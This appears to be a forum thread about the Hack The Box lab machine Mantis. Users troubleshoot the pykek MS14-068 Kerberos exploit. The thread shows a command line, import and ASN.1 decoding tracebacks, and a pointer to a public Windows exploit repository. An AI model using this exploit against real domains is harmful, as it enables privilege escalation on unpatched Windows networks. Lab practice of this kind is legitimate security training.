Root@kali:~/Documents/mantis# python -u james@HTB.LOCAL -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d MANTIS
Traceback (most recent call last):
File “”, line 17, in
from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
ImportError: No module named kek.ccache

i am getting above error.
please help.

git clone GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合

Grabbing the whole repo so you are not missing the pykek cache.

And then simply just go over to cd windows-kernel-exploits

And do another cd into MS14-068/pykek

Problem solved.


If you are about to use the pykek exploit be sure that it ain’t gonna work for the Active box, it’s patched.

still not work this exploit////

[+] Building AS-REQ for mantis.htb.local… Done!
[+] Sending AS-REQ to mantis.htb.local… Done!
[+] Receiving AS-REP from mantis.htb.local… Done!
[+] Parsing AS-REP from mantis.htb.local…Traceback (most recent call last):
File “./”, line 189, in
sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
File “./”, line 48, in sploit
as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
File “/opt/windows-kernel-exploits/MS14-068/pykek/kek/”, line 431, in decrypt_as_rep
return _decrypt_rep(data, key, AsRep(), EncASRepPart(), 8)
File “/opt/windows-kernel-exploits/MS14-068/pykek/kek/”, line 419, in _decrypt_rep
rep = decode(data, asn1Spec=spec)[0]
File “/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/”, line 792, in call
stGetValueDecoder, self, substrateFun
File “/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/”, line 55, in valueDecoder
value, _ = decodeFun(head, asn1Spec, tagSet, length)
File “/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/”, line 798, in call
‘%r not in asn1Spec: %r’ % (tagSet, asn1Spec)
pyasn1.error.PyAsn1Error: TagSet(Tag(tagClass=0, tagFormat=32, tagId=16), Tag(tagClass=64, tagFormat=32, tagId=30)) not in asn1Spec: AsRep()